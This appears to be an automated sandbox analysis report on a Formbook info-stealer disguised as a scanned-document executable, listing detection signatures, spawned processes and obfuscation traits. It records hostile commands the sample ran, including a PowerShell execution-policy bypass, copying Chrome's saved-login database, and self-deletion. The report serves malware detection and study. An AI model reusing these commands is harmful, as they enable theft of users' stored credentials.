Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.826046931.0000000005B70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799769107.0000000000397000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.826583597.0000000000B32000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.825199884.0000000000436000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameReZer0V4.exe. vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.829222069.0000000001590000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000000.824272503.0000000000FD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exeBinary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\wscript.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: SKMBT 25032020 Ref- 0000019.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Cookies7n1p8js.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains many API calls related to securityShow sources
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/21@41/7
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeFile created: C:\Users\Public\cAFdqNkr.ps1Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_01
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeMutant created: \Sessions\1\BaseNamedObjects\ASvyjsAiwyLTzwKn
Creates temporary filesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jkjtrz3.fhh.ps1Jump to behavior
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
PE file has an executable .text section and no other executable sectionShow sources
Source: SKMBT 25032020 Ref- 0000019.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: SKMBT 25032020 Ref- 0000019.exeVirustotal: Detection: 24%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: unknownProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: unknownProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}Jump to behavior
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeProcess created: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe {path}Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe'Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\cAFdqNkr.ps1'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeProcess created: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe {path}
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
PE file contains a COM descriptor data directoryShow sources
Source: SKMBT 25032020 Ref- 0000019.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: SKMBT 25032020 Ref- 0000019.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: explorer.pdbUGP source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.880956689.0000000007010000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe, 00000015.00000002.1349336799.0000000000B50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp, Cookies7n1p8js.exe
Source: Binary string: wscript.pdb source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb source: Cookies7n1p8js.exe, 00000015.00000002.1352349999.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.880956689.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeUnpacked PE file: 21.2.Cookies7n1p8js.exe.400000.0.unpack .text:ER;.reloc:R;.rsrc:R; vs .text:ER;
.NET source code contains potential unpackerShow sources
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs.Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs.Net Code: \x06 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C2718 push edi; ret 0_2_001C27E8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C220C push edi; ret 0_2_001C22DC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C3E02 push edi; ret 0_2_001C3F8C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C2A20 push edi; ret 0_2_001C2AF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C2C74 push edi; ret 0_2_001C2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C6162 push edi; ret 0_2_001C61D0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C3C94 push edi; ret 0_2_001C3D64
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C2B8E push edi; ret 0_2_001C2D44
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C34AC push edi; ret 0_2_001C357C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C62D8 push edi; ret 0_2_001C63A8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C50F8 push edi; ret 0_2_001C51C8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C5FF4 push edi; ret 0_2_001C60C4
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C39E8 push edi; ret 0_2_001C3AB8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 0_2_001C2DE2 push edi; ret 0_2_001C2FFC
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_00AF34AC push edi; ret 4_2_00AF357C
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_00AF2B8E push edi; ret 4_2_00AF2D44
